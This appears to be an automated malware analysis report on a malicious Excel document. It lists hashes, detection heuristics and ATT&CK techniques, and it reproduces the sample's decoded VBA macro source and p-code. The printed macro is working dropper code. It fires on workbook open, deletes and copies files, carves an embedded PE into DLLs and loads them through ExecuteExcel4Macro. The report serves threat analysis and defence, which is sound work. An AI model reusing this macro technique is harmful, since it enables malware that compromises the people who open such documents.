Office (OLE) malware analysis — malicious · 4eea8fccc29df669

MALICIOUS

Office (OLE)

795.0 KB Created: 2020-06-22 10:41:03 Authoring application: Microsoft Excel First seen: 2020-07-24

MD5: 779a1231de8ddd8646f60fdc7505fbf2 SHA-1: fb3a0cd42ee09dc518c2fbd21d7c738ee0a399a8 SHA-256: 4eea8fccc29df6694bcf7693f23cc23550d533ac4e6fb0442ebe98561bcb3fc8

590 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The sample is a malicious Excel document containing a Workbook_Open VBA macro. This macro triggers the execution of an embedded PE executable, identified as a dropper by ClamAV. The presence of Shell() calls and references to LoadLibrary and GetProcAddress APIs indicate the macro is designed to load and execute the embedded payload, likely downloading additional stages.

Heuristics 14

ClamAV: Win.Dropper.Hideproc-6663113-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Dropper.Hideproc-6663113-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

         sendings = 1
         Dim sNMSP As New Shell
         FlagDouble = True

VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER

The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.

CallByName call high OLE_VBA_CALLBYNAME

CallByName call

Matched line in script

CallByName DestinationKat, "CopyHere", VbMethod, harvest.Items.Item(Lrigat)

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Workbook_Open()
If WelcomeDialog.Visible = True Then

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Reference to GetProcAddress API high SC_STR_GETPROCADDRESS

Reference to GetProcAddress API
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	46396 bytes
SHA-256: `636493c262dc2d468b008f1a91fbc04c93896e7befb6e2f54d4c87423f1cec6a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() If WelcomeDialog.Visible = True Then Exit Sub End If Module2.WuzzyBud 3900 End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Worksheet_SelectionChange(ByVal Target As Range) End Sub Attribute VB_Name = "Page11" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Repositor" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Dim vSpeed As Integer Dim vLicensePlate As String Public Property Get Speed() As Integer Speed = vSpeed End Property Public Property Get CheckCar(car As Object, Drive As String) CheckCar = car.SpecialFolders("" & Drive) End Property Public Property Get SpecialFolders() As String LicensePlate = vLicensePlate End Property Public Property Let LicensePlate(lp As String) If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error vLicensePlate = lp End Property Public Property Let Speed(sp As Integer) End Property Attribute VB_Name = "Module0" Public Sub VistaQ(WhereToGo) DoEvents ThisWorkbook.Sheets.Copy Application.DisplayAlerts = False DoEvents ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9 DoEvents DoEvents ActiveWorkbook.Close DoEvents DoEvents End Sub Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant) On Error Resume Next For Each Key In putArrayBigList Kill Key Next Key On Error GoTo 0 End Sub Public Sub DerTip() Dim ofbl As String Dim sOfbl As String Dim CurrentSizeOfAT As Long Dim sendings As Integer dershlep = "" + Dialog4.TextBox1.Tag Dialog4.TextBox3.ControlTipText = Dialog4.TextBox3.Tag ofbl = Dialog4.TextBox3.ControlTipText ofbl = ofbl + "\libUltra" ctackPup = Dialog4.TextBox1.Tag + "\mannua" ctackPup = ctackPup + "l.xlsx" ctackPop = dershlep & Dialog4.TextBox3.Value Dim arr(1 To 3) As String ctackPip = ctackPup & Page11.Range("B115").Value PublicResumEraseByArrayList ofbl + "", ctackPop, ctackPip VistaQ ctackPup FileCopy ctackPup, ctackPip sendings = 1 Dim sNMSP As New Shell FlagDouble = True Lrigat = Dialog4.Label11.Tag If sendings > 0 And sendings > -30 Then Set DestinationKat = sNMSP.Namespace(dershlep) Set harvest = sNMSP.Namespace(ctackPip) End If CallByName DestinationKat, "CopyHere", VbMethod, harvest.Items.Item(Lrigat) Dim car As Repositor Set car = New Repositor For StepBit = 1 To 2 CurrentSizeOfAT = 289280 sendings = 1 sendingsCSTR = "1" If FlagDouble Then CurrentSizeOfAT = 200000 + 92860 + 4 sendings = 2 FlagDouble = False sendingsCSTR = "2" End If sOfbl = ofbl + sendingsCSTR + ".dll" Composition dershlep + Dialog4.Label1.Tag, sOfbl, CurrentSizeOfAT, sendings If sendings < 100 Then sendings = sendings + 1 sendings = sendings + 1 End If If -100 <= sendings Then sendings = sendings + 1 ChDir Dialog4.TextBox3.Tag sendings = sendings + 1 End If sOfbl = """" + sOfbl & """,""" If sendings < 0 Then sendings = sendings + 1 sendings = sendings + 1 End If If sendings > 1000 Then sendings = sendings + 1 End If If sendings < 0 Then sendings = sendings + 1 End If If sendings < 0 Then sendings = sendings + 1 sendings = sendings + 1 End If If HiddenEE4M(sOfbl) Then Exit Sub End If Next End Sub Attribute VB_Name = "Module1" Public Const FirstB As Byte = 77 Public Const SecondB As Byte = 90 Public Const ThirdB As Byte = 144 Public Sub GetParam(Count As Integer) Dim i As Long Dim j As Integer Dim c As String Dim tooolsetChunkI As Boolean Dim tooolsetChunkQ As Boolean j = 1 tooolsetChunkI = False tooolsetChunkQ = False GetP.aram = "" For i = 1 To Len(Comma.nd$) c = Mi.d$(Comma.nd$, i, 1) If tooolsetChunkI Then If c = """" Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If ElseIf tooolsetChunkI And Not tooolsetChunkQ Then If c = " " Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If Else If c = """" Then If j > Count Then Exit Sub tooolsetChunkI = True tooolsetChunkQ = True ElseIf c <> " ccc" Then End If End If If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c Next i End Sub Attribute VB_Name = "Module2" Public DisputeChannel3 As Byte Public DecemberUpdate As Byte Public HurricanMoes() As Byte Public abbrev As Byte Public Sub WuzzyBud(dImmer As Integer) If WelcomeDialog.Visible = True Then Exit Sub End If Dim s As String Dim GetInfirmityLevelDescription As String Dim d As Long d = 3 d = d - 1 Dim redoMochup As New WshShell Select Case d Case 0 s = "No health problems" Case 1 s = "Minor health problems" Case 2 s = "Major health problems" Case 3 s = "Severe disability" End Select Dim car As Repositor Dim SpecialPath As String PRP = "%" & Dialog4.TextBox1.Tag Dialog4.TextBox1.Tag = redoMochup.ExpandEnvironmentStrings(PRP + "%") Set car = New Repositor Dialog4.TextBox3.Tag = car.CheckCar(redoMochup, Dialog4.TextBox3.ControlTipText & "") ChDir (Dialog4.TextBox1.Tag) If WelcomeDialog.Visible = False Then WelcomeDialog.Show End If End Sub Attribute VB_Name = "Module4" Public Sub GetParam(Count As Integer) Dim i As Long Dim j As Integer Dim c As String Dim tooolsetChunkI As Boolean Dim tooolsetChunkQ As Boolean j = 1 tooolsetChunkI = False tooolsetChunkQ = False GetP.aram = "" For i = 1 To Len(Comma.nd$) c = Mi.d$(Comma.nd$, i, 1) If tooolsetChunkI Then If c = """" Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If ElseIf tooolsetChunkI And Not tooolsetChunkQ Then If c = " " Then j = j + 1 tooolsetChunkI = False tooolsetChunkQ = False End If Else If c = """" Then If j > Count Then Exit Sub tooolsetChunkI = True tooolsetChunkQ = True ElseIf c <> " " Then tooolsetChunkI = True End If End If If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c Next i End Sub Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer) Dim ProstoPlan As Long Dim logicVari As Integer Dim SimpleMethod As Integer ReDim HurricanMoes(1 To fl) ProstoPlan = FreeFile Open Composition2 For Binary Access Read As ProstoPlan logicVari = 1 Do While 1 Get ProstoPlan, , abbrev If abbrev = FirstB Then HurricanMoes(1) = abbrev Get ProstoPlan, , DisputeChannel3 If DisputeChannel3 = SecondB Then HurricanMoes(2) = DisputeChannel3 Get ProstoPlan, , DecemberUpdate If DecemberUpdate = ThirdB Then HurricanMoes(3) = DecemberUpdate If logicVari = DisputeChannel6 Then For k = 4 To fl Get ProstoPlan, , abbrev HurricanMoes(k) = abbrev Next k Exit Do Else logicVari = logicVari + 1 End If End If End If End If Loop On Error Resume Next LoopIfEnd = 400 Close ProstoPlan LoopIfEnd = 400 + LoopIfEnd ProstoPlan = FreeFile LoopIfEnd = 400 + LoopIfEnd Open ofbl For Binary Lock Read Write As #ProstoPlan LoopIfEnd = 400 + LoopIfEnd zeroBob = 1 For i = zeroBob To UBound(HurricanMoes) If WelcomeDialog.Enabled = True Then Put #ProstoPlan, , HurricanMoes(i) End If Next i Close ProstoPlan ProstoPlan = FreeFile For HSP = 33 To -1 Step -0.25 ProstoPlan = 6 + i Next HSP End Sub Private Sub cmd_Keluar_Click() Unload LSD.Me MDIForm1.dokter.Enabled = True MDIForm1.dokter.Checked = False End Sub Private Sub cmd_Perbaiki_Click() If cmd_Perbaiki.Caption = "Pe&rbaiki" Then cmd_Simpan.Enabled = False cmd_Hapus.Enabled = False cmd_Batal.Enabled = True Dim var As String var = InputBox("Ketikkan kode dokter yang datanya akan di perbaiki !", "Perbaiki Data dokter") If var = Empty Then Exit Sub Data1.Recordset.Index = "Kode_dokter" Data1.Recordset.Seek "=", var If Not Data1.Recordset.NoMatch Then Call tam.pil txtkd_dok.Enabled = False txtnm_dok.Enabled = True cmd_Perbaiki.Caption = "&Perbaharui data" Else MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan" End If Else Data1.Recordset.Edit Data1.Recordset!kode_dokter = txtkd_dok.Text Data1.Recordset!nama_dokter = txtnm_dok.Text Data1.Recordset.Update Call ber.sih cmd_Perbaiki.Caption = "Pe&rbaiki" cmd_Batal.Enabled = False cmd_Simpan.Enabled = True cmd_Hapus.Enabled = True Call tdk_bi.sa End If End Sub Private Sub cmd_Simpan_Click() If cmd_Simpan.Caption = "&Isi Data" Then Call bis.a nom.Or M.e.txtnm_dok.SetFocus cmd_Batal.Enabled = True cmd_Perbaiki.Enabled = False cmd_Hapus.Enabled = False cmd_cari.Enabled = False cmd_Simpan.Caption = "&Simpan Data" Else If txtkd_dok.Text = "" Or _ txtnm_dok.Text = "" Then MsgBox "Data tidak boleh kosong !", vbCritical, "SISTEM PENJUALAN KREDIT" txtkd_dok.SetFocus Else cmd_Batal.Enabled = False cmd_Perbaiki.Enabled = True cmd_Hapus.Enabled = True cmd_cari.Enabled = True Data1.Recordset.AddNew Data1.Recordset!kode_dokter = txtkd_dok.Text Data1.Recordset!nama_dokter = txtnm_dok.Text Data1.Recordset.Update Call ber.sih cmd_Simpan.Caption = "&Isi Data" End If End If End Sub Attribute VB_Name = "Module5" Public Function HiddenEE4M(sOfbl) HiddenEE4M = False varRes1 = ExecuteExcel4Macro("CALL(" + sOfbl + "goldman"",""J"")") If IsNumeric(varRes1) Then If varRes1 = 0 Then HiddenEE4M = True End If End If End Function Private Sub Command7_Click() b = MsgBox("?????????", vbYesNo) If b = vbYes Then a = "delete from cinema where cinid='" a = a + Text1.Text + "'" cnmovie.Execute a rs4.Close Sql = "select from cinema" rs4.Open Sql, cnmovie, adOpenDynamic, adLockOptimistic If rs.BOF And rs.EOF Then MsgBox "?????!" Else rs4.MoveFirst Call View.Data End If End If End Sub Private Sub nomor() Dim urutan As String * 5 Dim hitung As Byte If Data1.Recordset.RecordCount = 0 Then urutan = "Dr" & "001" Else Data1.Recordset.MoveLast If Val(Left(Data1.Recordset!kode_dokter, 3)) <> "000" Then urutan = "00" & "001" Else hitung = Val(Right(Data1.Recordset!kode_dokter, 3)) + 1 urutan = "Dr" & Right("000" & hitung, 3) End If End If M.e.txtkd_dok = urutan End Sub Private Sub cmd_Batal_Click() Call be.rsih Call td.k_bisa cmd_Batal.Enabled = False cmd_Perbaiki.Enabled = True cmd_Hapus.Enabled = True cmd_cari.Enabled = True End Sub Private Sub cmd_cari_Click() Dim var As String var = InputBox("Masukan Kode Dokter yang ingin anda cari!", "Cari data dokter") If var = Empty Then Exit Sub If var <> "" Then Data1.Recordset.Index = "kode_dokter" Data1.Recordset.Seek "=", var If Not Data1.Recordset.NoMatch Then Call tam.pil Call bi.sa Call kun.ci Else MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan" End If End If End Sub Private Sub cmd_Hapus_Click() Dim var As String var = InputBox("Masukan Kode dokter yang akan dihapus!", "Hapus dokter") If var = Empty Then Exit Sub If var <> "" Then Data1.Recordset.Index = "Kode_dokter" Data1.Recordset.Seek "=", var If Not Data1.Recordset.NoMatch Then Data1.Recordset.Delete Data1.Refresh Data1.Recordset.MoveFirst Else MsgBox "Data dokter dengan kode dokter " & var & " tidak diketemukan" End If End If End Sub Attribute VB_Name = "Dialog4" Attribute VB_Base = "0{C700E57F-9AAC-4BC0-9D57-055CA442DBD9}{3B9877C1-D161-4596-B086-1A549513FECB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "WelcomeDialog" Attribute VB_Base = "0{92A9393B-3F5E-470D-B46C-19191FCC4246}{C8B3DF52-2EFF-4BDF-A0C1-BAF16B946ADC}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub UserForm_Activate() DoEvents DoEvents DerTip DoEvents End Sub Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True ' Processing file: /tmp/qstore_hon1jbki ' =============================================================================== ' Module streams: ' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 1883 bytes ' Line #0: ' FuncDefn (Private Sub Workbook_Open()) ' Line #1: ' Ld WelcomeDialog ' MemLd Visible ' LitVarSpecial (True) ' Eq ' IfBlock ' Line #2: ' ExitSub ' Line #3: ' EndIfBlock ' Line #4: ' LitDI2 0x0F3C ' Ld Module2 ' ArgsMemCall WuzzyBud 0x0001 ' Line #5: ' EndSub ' _VBA_PROJECT_CUR/VBA/Sheet1 - 1639 bytes ' Line #0: ' FuncDefn (Private Sub Worksheet_SelectionChange(ByVal Target As )) ' Line #1: ' Line #2: ' EndSub ' _VBA_PROJECT_CUR/VBA/Page11 - 1705 bytes ' _VBA_PROJECT_CUR/VBA/Repositor - 4406 bytes ' Line #0: ' Line #1: ' Dim ' VarDefn vSpeed (As Integer) ' Line #2: ' Dim ' VarDefn vLicensePlate (As String) ' Line #3: ' Line #4: ' FuncDefn (Public Property Get Speed(id_FFFE As Integer) As Integer) ' Line #5: ' Ld vSpeed ' St Speed ' Line #6: ' EndProp ' Line #7: ' Line #8: ' Line #9: ' FuncDefn (Public Property Get CheckCar(car As Object, Drive As String, id_FFFE As Variant)) ' Line #10: ' LitStr 0x0000 "" ' Ld Drive ' Concat ' Ld car ' ArgsMemLd SpecialFolders 0x0001 ' St CheckCar ' Line #11: ' Line #12: ' EndProp ' Line #13: ' FuncDefn (Public Property Get SpecialFolders(id_FFFE As String) As String) ' Line #14: ' Ld vLicensePlate ' St LicensePlate ' Line #15: ' EndProp ' Line #16: ' Line #17: ' FuncDefn (Public Property Let LicensePlate(lp As String)) ' Line #18: ' Ld lp ' FnLen ' LitDI2 0x0006 ' Ne ' If ' BoSImplicit ' Ld xlErrValue ' Paren ' Ld Err ' ArgsMemCall Raise 0x0001 ' EndIf ' QuoteRem 0x0030 0x000B "Raise error" ' Line #19: ' Ld lp ' St vLicensePlate ' Line #20: ' EndProp ' Line #21: ' Line #22: ' Line #23: ' FuncDefn (Public Property Let Speed(sp As Integer)) ' Line #24: ' Line #25: ' EndProp ' Line #26: ' Line #27: ' _VBA_PROJECT_CUR/VBA/Module0 - 8721 bytes ' Line #0: ' Line #1: ' Line #2: ' Line #3: ' Line #4: ' Line #5: ' FuncDefn (Public Sub VistaQ(WhereToGo)) ' Line #6: ' ArgsCall DoEvents 0x0000 ' Line #7: ' Ld ThisWorkbook ' MemLd Sheets ' ArgsMemCall Copy 0x0000 ' Line #8: ' LitVarSpecial (False) ' Ld Application ' MemSt DisplayAlerts ' Line #9: ' ArgsCall DoEvents 0x0000 ' Line #10: ' Ld WhereToGo ' LitVarSpecial (False) ' ParamNamed Local ' LitDI2 0x0003 ' LitDI2 0x0007 ' Mul ' LitDI2 0x0003 ' LitDI2 0x0007 ' Mul ' Add ' LitDI2 0x0009 ' Add ' ParamNamed FileFormat ' Ld ActiveWorkbook ' ArgsMemCall SaveAs 0x0003 ' Line #11: ' ArgsCall DoEvents 0x0000 ' Line #12: ' ArgsCall DoEvents 0x0000 ' Line #13: ' Ld ActiveWorkbook ' ArgsMemCall Close 0x0000 ' Line #14: ' ArgsCall DoEvents 0x0000 ' Line #15: ' ArgsCall DoEvents 0x0000 ' Line #16: ' Line #17: ' Line #18: ' EndSub ' Line #19: ' Line #20: ' Line #21: ' Line #22: ' Line #23: ' Line #24: ' FuncDefn (Public Sub PublicResumEraseByArrayList(putArrayBigList As )) ' Line #25: ' OnError (Resume Next) ' Line #26: ' StartForVariable ' Ld Key ' EndForVariable ' Ld putArrayBigList ' ForEach ' Line #27: ' Ld Key ' ArgsCall Kill 0x0001 ' Line #28: ' StartForVariable ' Ld Key ' EndForVariable ' NextVar ' Line #29: ' OnError (GoTo 0) ' Line #30: ' EndSub ' Line #31: ' Line #32: ' Line #33: ' Line #34: ' Line #35: ' Line #36: ' Line #37: ' Line #38: ' FuncDefn (Public Sub DerTip()) ' Line #39: ' Line #40: ' Line #41: ' Line #42: ' Dim ' VarDefn ofbl (As String) ' Line #43: ' Dim ' VarDefn sOfbl (As String) ' Line #44: ' Dim ' VarDefn CurrentSizeOfAT (As Long) ' Line #45: ' Line #46: ' Dim ' VarDefn sendings (As Integer) ' Line #47: ' LitStr 0x0000 "" ' Ld Dialog4 ' MemLd TextBox1 ' MemLd Tag ' Add ' St dershlep ' Line #48: ' Ld Dialog4 ' MemLd TextBox3 ' MemLd Tag ' Ld Dialog4 ' MemLd TextBox3 ' MemSt ControlTipText ' Line #49: ' Line #50: ' Ld Dialog4 ' MemLd TextBox3 ' MemLd ControlTipText ' St ofbl ' Line #51: ' Ld ofbl ' LitStr 0x0009 "\libUltra" ' Add ' St ofbl ' Line #52: ' Ld Dialog4 ' MemLd TextBox1 ' MemLd Tag ' LitStr 0x0007 "\mannua" ' Add ' St ctackPup ' Line #53: ' Ld ctackPup ' LitStr 0x0006 "l.xlsx" ' Add ' St ctackPup ' Line #54: ' Ld dershlep ' Ld Dialog4 ' MemLd TextBox3 ' MemLd Value ' Concat ' St ctackPop ' Line #55: ' Line #56: ' Dim ' LitDI2 0x0001 ' LitDI2 0x0003 ' VarDefn arr (As String) ' Line #57: ' Line #58: ' Line #59: ' Line #60: ' Ld ctackPup ' LitStr 0x0004 "B115" ' Ld Page11 ' ArgsMemLd Range 0x0001 ' MemLd Value ' Concat ' St ctackPip ' Line #61: ' Line #62: ' Ld ofbl ' LitStr 0x0001 "*" ' Add ' Ld ctackPop ' Ld ctackPip ' ArgsCall PublicResumEraseByArrayList 0x0003 ' Line #63: ' Line #64: ' Line #65: ' Ld ctackPup ' ArgsCall VistaQ 0x0001 ' Line #66: ' Line #67: ' Ld ctackPup ' Ld ctackPip ' ArgsCall FileCopy 0x0002 ' Line #68: ' LitDI2 0x0001 ' St sendings ' Line #69: ' Dim ' VarDefn sNMSP (New As Shell) ' Line #70: ' LitVarSpecial (True) ' St FlagDouble ' Line #71: ' Line #72: ' Ld Dialog4 ' MemLd Label11 ' MemLd Tag ' St Lrigat ' Line #73: ' Line #74: ' Ld sendings ' LitDI2 0x0000 ' Gt ' Ld sendings ' LitDI2 0x001E ' UMi ' Gt ' And ' IfBlock ' Line #75: ' Line #76: ' SetStmt ' Ld dershlep ' Ld sNMSP ' ArgsMemLd Namespace 0x0001 ' Set DestinationKat ' Line #77: ' SetStmt ' Ld ctackPip ' Ld sNMSP ' ArgsMemLd Namespace 0x0001 ' Set harvest ' Line #78: ' Line #79: ' Line #80: ' EndIfBlock ' Line #81: ' Line #82: ' Line #83: ' Ld DestinationKat ' LitStr 0x0008 "CopyHere" ' Ld VbMethod ' Ld Lrigat ' Ld harvest ' MemLd Items ' ArgsMemLd Item 0x0001 ' ArgsCall CallByName 0x0004 ' Line #84: ' Line #85: ' Dim ' VarDefn car (As Repositor) ' Line #86: ' Line #87: ' SetStmt ' New id_FFFF ' Set car ' Line #88: ' StartForVariable ' Ld StepBit ' EndForVariable ' LitDI2 0x0001 …
`embedded_office_00001b61.exe`	embedded-pe	Office MZ+PE at offset 0x1B61	807071 bytes
SHA-256: `c1839d84105a95668945680ecd6c1858306d7c2a6f3309b2aaeaacfddcc4b1da`
Detection ClamAV: Win.Dropper.Hideproc-6663113-0 Obfuscation or payload: likely Static shellcode analysis recovered command string(s): WScript.Shell Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: MBD01077535/Ole10Native	586697 bytes
SHA-256: `96da46e1b9dc6604d24792dd7853901ee44ecbe8286f742a2483090f0688ee90`

Open this report in the interactive analyzer, or submit your own file for analysis.